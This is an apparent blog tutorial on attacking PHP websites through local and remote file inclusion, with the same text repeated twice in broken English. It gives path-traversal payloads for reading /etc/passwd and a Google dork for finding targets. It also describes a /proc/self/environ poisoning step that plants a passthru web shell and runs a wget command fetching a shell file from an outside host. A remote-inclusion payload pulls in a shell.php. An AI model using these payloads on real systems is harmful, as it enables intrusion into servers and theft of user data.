LFI- local file inclusion
Its include the file of the server in our browser..
To see if a script is vulnerable to local file inclusion,
index.php?page=../../../../../../../../../etc/passwd
That Shows the complete User information in that server with paths..
Where ../ causes the script to move up one directoryWhere directory,
Multiple ../ cause the script to move to the top level directory (/, the root of the
filesystem) and /etc/passwd is the Unix passwd file.
google dork: inurl:.php?page=
example:www.xxx.com/contacts.php?page=abc.php
test:www.xxx.com/contacts.php?page=../xyz.php
now in linux server server there is etc/password
1... www.xyz.com/index
../
=../../../etc/passwd
=../../../etc/passwd
etc/passwdfile (google)
proc/self/environ is the writable file by end
or var/log/httpd-access.log is also writable
proc/self/environ
add one- user agent switcher
config.php
<?php passthru($_GET['cmd']) ?>
../proc/self//environ&cmd=wget http://
t35.com/abc.txt O shell.php
config.php
ip
username
pwd
Done..
----------------------------------------------------------------------------------------------
RFI - Remote file inclusion
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites.
It allows an attacker to include a remote file, usually through a script on the web
server. The vulnerability occurs due to the use of user-supplied input without
proper validation. This can lead to something as minimal as outputting the contents
of the file, but depending on the severity, to list a few it can lead to:
-> Code execution on the web server
-> Code execution on the client-side such as JavaScript which can lead to other
attacks such as cross site scripting (XSS).
-> Denial of Service (DoS)
-> Data Theft/Manipulation
By default allow_url_include is ON -----> in php.ini
www.xxx.com/contacts.php?page=http://www.abc.com/shell.php
>> TOOL Descriptions:
FIMAP
FIMAP is a Local and Remote file inclusion auditing Tool (LFI/RFI).
Fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection.
Download
Local File Inclusion Vulnerability Scanner
Description:
The Simple Local File Inclusion Vulnerability Scanner helps you to find LFI vulnerabilities.
This tool is only able to handle “simple” LFI vulnerabilities, but not complex ones.
Usage:
./lfi_scanner.py –url=
Usage example:
./lfi_scanner.py –url=”http://www.example.com/page.php?file=mai
Download Script
Its include the file of the server in our browser..
To see if a script is vulnerable to local file inclusion,
index.php?page=../../../../../../../../../etc/passwd
That Shows the complete User information in that server with paths..
Where ../ causes the script to move up one directoryWhere directory,
Multiple ../ cause the script to move to the top level directory (/, the root of the
filesystem) and /etc/passwd is the Unix passwd file.
google dork: inurl:.php?page=
example:www.xxx.com/contacts.php?page=abc.php
test:www.xxx.com/contacts.php?page=../xyz.php
now in linux server server there is etc/password
1... www.xyz.com/index
../
=../../../etc/passwd
=../../../etc/passwd
etc/passwdfile (google)
proc/self/environ is the writable file by end
or var/log/httpd-access.log is also writable
proc/self/environ
add one- user agent switcher
config.php
<?php passthru($_GET['cmd']) ?>
../proc/self//environ&cmd=wget http://
t35.com/abc.txt O shell.php
config.php
ip
username
pwd
Done..
----------------------------------------------------------------------------------------------
RFI - Remote file inclusion
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites.
It allows an attacker to include a remote file, usually through a script on the web
server. The vulnerability occurs due to the use of user-supplied input without
proper validation. This can lead to something as minimal as outputting the contents
of the file, but depending on the severity, to list a few it can lead to:
-> Code execution on the web server
-> Code execution on the client-side such as JavaScript which can lead to other
attacks such as cross site scripting (XSS).
-> Denial of Service (DoS)
-> Data Theft/Manipulation
By default allow_url_include is ON -----> in php.ini
www.xxx.com/contacts.php?page=http://www.abc.com/shell.php
>> TOOL Descriptions:
FIMAP
Fimap is a little python tool which can find, prepare, audit, exploit and even google automatically for local and remote file inclusion bugs in webapps. fimap should be something like sqlmap just for LFI/RFI bugs instead of sql injection.
Download
Local File Inclusion Vulnerability Scanner
Description:
The Simple Local File Inclusion Vulnerability Scanner helps you to find LFI vulnerabilities.
This tool is only able to handle “simple” LFI vulnerabilities, but not complex ones.
Usage:
./lfi_scanner.py –url=
Usage example:
./lfi_scanner.py –url=”http://www.example.com/page.php?file=mai
Download Script
0 comments:
Post a Comment